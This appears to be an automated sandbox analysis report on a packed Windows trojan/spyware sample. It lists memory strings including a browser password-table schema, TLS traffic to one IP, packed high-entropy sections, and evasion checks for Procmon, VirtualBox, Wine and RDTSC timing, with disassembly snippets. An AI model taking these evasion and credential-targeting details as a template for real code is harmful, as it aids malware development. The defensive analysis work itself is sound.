Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49727 version: TLS 1.2

System Summary

Source: IERiUft8Wi.exe Static PE information: section name:
Source: IERiUft8Wi.exe Static PE information: section name: .idata
Source: IERiUft8Wi.exe Static PE information: section name:
Source: IERiUft8Wi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: IERiUft8Wi.exe Static PE information: Section: ZLIB complexity 0.9995851205065359
Source: IERiUft8Wi.exe Static PE information: Section: jvzofgxg ZLIB complexity 0.9946556193946189
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: IERiUft8Wi.exe, 00000000.00000003.1345212498.000000000568E000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344822762.00000000056AA000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1370392940.000000000569E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: IERiUft8Wi.exe Virustotal: Detection: 54%
Source: IERiUft8Wi.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\IERiUft8Wi.exe File read: C:\Users\user\Desktop\IERiUft8Wi.exe
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Section loaded: version.dll
Source: IERiUft8Wi.exe Static file information: File size 1884672 > 1048576
Source: IERiUft8Wi.exe Static PE information: Raw size of jvzofgxg is bigger than: 0x100000 < 0x1a2200

Data Obfuscation

Source: C:\Users\user\Desktop\IERiUft8Wi.exe Unpacked PE file: 0.2.IERiUft8Wi.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jvzofgxg:EW;jsezhyer:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jvzofgxg:EW;jsezhyer:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: IERiUft8Wi.exe Static PE information: real checksum: 0x1d4f86 should be: 0x1db5e9
Source: IERiUft8Wi.exe Static PE information: section name:
Source: IERiUft8Wi.exe Static PE information: section name: .idata
Source: IERiUft8Wi.exe Static PE information: section name:
Source: IERiUft8Wi.exe Static PE information: section name: jvzofgxg
Source: IERiUft8Wi.exe Static PE information: section name: jsezhyer
Source: IERiUft8Wi.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Code function: 0_3_00DAD1D8 push eax; iretd 0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Code function: 0_3_00DADD7B push eax; ret 0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Code function: 0_3_00DAF178 push eax; iretd 0_3_00DAF179
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Code function: 0_3_00DACF68 push eax; iretd 0_3_00DACF69
Source: IERiUft8Wi.exe Static PE information: section name: entropy: 7.981882961435573
Source: IERiUft8Wi.exe Static PE information: section name: jvzofgxg entropy: 7.955291479684767

Boot Survival

Source: C:\Users\user\Desktop\IERiUft8Wi.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\IERiUft8Wi.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\IERiUft8Wi.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\IERiUft8Wi.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\IERiUft8Wi.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\IERiUft8Wi.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: 888FD5 second address: 888FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: 888FDB second address: 888854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1EE2h], edx 0x00000014 push dword ptr [ebp+122D0EB5h] 0x0000001a jg 00007F0E38E1CB1Ch 0x00000020 call dword ptr [ebp+122D3647h] 0x00000026 pushad 0x00000027 jmp 00007F0E38E1CB21h 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov edi, dword ptr [ebp+122D2A3Dh] 0x00000035 mov ebx, dword ptr [ebp+122D2B09h] 0x0000003b popad 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dl, bl 0x00000043 mov dx, 5E00h 0x00000047 popad 0x00000048 jns 00007F0E38E1CB1Ch 0x0000004e mov dword ptr [ebp+122D2BC5h], eax 0x00000054 jmp 00007F0E38E1CB1Dh 0x00000059 mov esi, 0000003Ch 0x0000005e jmp 00007F0E38E1CB29h 0x00000063 jmp 00007F0E38E1CB21h 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jnl 00007F0E38E1CB17h 0x00000072 lodsw 0x00000074 sub dword ptr [ebp+122D3657h], edx 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D3657h], edi 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 pushad 0x00000089 movsx edi, si 0x0000008c mov dword ptr [ebp+122D1D25h], esi 0x00000092 popad 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 jmp 00007F0E38E1CB23h 0x0000009b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A0D245 second address: A0D24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A0D67A second address: A0D687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F0E38E1CB16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A0D687 second address: A0D6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A359h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A0D946 second address: A0D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E38E1CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A1162C second address: A1164A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E3850A356h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A1164A second address: A1165C instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A1165C second address: A11666 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11719 second address: A1171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A1171F second address: A11740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D2AC5h] 0x0000000f push 00000000h 0x00000011 add si, A9AAh 0x00000016 push CF8AF700h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A1183E second address: A1184C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0E38E1CB1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A1184C second address: A118D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 08998B3Dh 0x0000000c push ecx 0x0000000d jmp 00007F0E3850A34Fh 0x00000012 pop edx 0x00000013 push 00000003h 0x00000015 mov dh, cl 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F0E3850A353h 0x00000020 jmp 00007F0E3850A354h 0x00000025 popad 0x00000026 mov dword ptr [ebp+122D35BAh], esi 0x0000002c popad 0x0000002d sub dword ptr [ebp+122D2C94h], esi 0x00000033 push 00000003h 0x00000035 jmp 00007F0E3850A354h 0x0000003a call 00007F0E3850A349h 0x0000003f jmp 00007F0E3850A34Ch 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A118D7 second address: A118DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A118DB second address: A11914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007F0E3850A351h 0x00000015 jmp 00007F0E3850A34Bh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F0E3850A34Eh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11914 second address: A11918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11A4F second address: A11A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E3850A359h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11A6F second address: A11AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0E38E1CB21h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jns 00007F0E38E1CB37h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007F0E38E1CB25h 0x0000001f pushad 0x00000020 jmp 00007F0E38E1CB25h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11AE3 second address: A11AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11AF4 second address: A11AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A11AF9 second address: A11BC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E3850A35Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b cld 0x0000000c mov esi, dword ptr [ebp+122D1D0Ah] 0x00000012 push 00000003h 0x00000014 mov edx, dword ptr [ebp+122D2A39h] 0x0000001a push 00000000h 0x0000001c mov di, 2C55h 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F0E3850A348h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov esi, dword ptr [ebp+122D334Bh] 0x00000042 call 00007F0E3850A349h 0x00000047 jc 00007F0E3850A356h 0x0000004d jmp 00007F0E3850A350h 0x00000052 push eax 0x00000053 jmp 00007F0E3850A350h 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c jno 00007F0E3850A35Bh 0x00000062 mov eax, dword ptr [eax] 0x00000064 jmp 00007F0E3850A353h 0x00000069 mov dword ptr [esp+04h], eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jnp 00007F0E3850A348h 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A33324 second address: A33337 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F0E38E1CB16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A31141 second address: A31147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A31147 second address: A3114B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A312C2 second address: A312DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F0E3850A352h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A312DF second address: A312E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A323D4 second address: A323DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A323DC second address: A323E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A32A3E second address: A32A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A32CFB second address: A32D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0E38E1CB1Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A365B6 second address: A365BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A35B72 second address: A35B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A36D3B second address: A36D41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A36E95 second address: A36E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A36E99 second address: A36E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A36E9F second address: A36EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0E38E1CB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A36EAA second address: A36ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0E3850A357h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F0E3850A346h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3CFB6 second address: A3CFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0E38E1CB16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3D368 second address: A3D39E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E3850A356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0E3850A353h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3D39E second address: A3D3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0E38E1CB26h 0x0000000b jmp 00007F0E38E1CB1Dh 0x00000010 jg 00007F0E38E1CB16h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3D3CE second address: A3D3DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0E3850A34Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40A28 second address: A40A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40AC7 second address: A40B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E3850A356h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 je 00007F0E3850A352h 0x00000019 jng 00007F0E3850A34Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40B04 second address: A40B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E38E1CB20h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40B1D second address: A40B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A358h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F0E3850A34Ch 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F0E3850A34Ah 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0E3850A348h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov di, FD93h 0x00000038 movsx esi, si 0x0000003b push 53180149h 0x00000040 pushad 0x00000041 pushad 0x00000042 jmp 00007F0E3850A34Fh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40B96 second address: A40B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
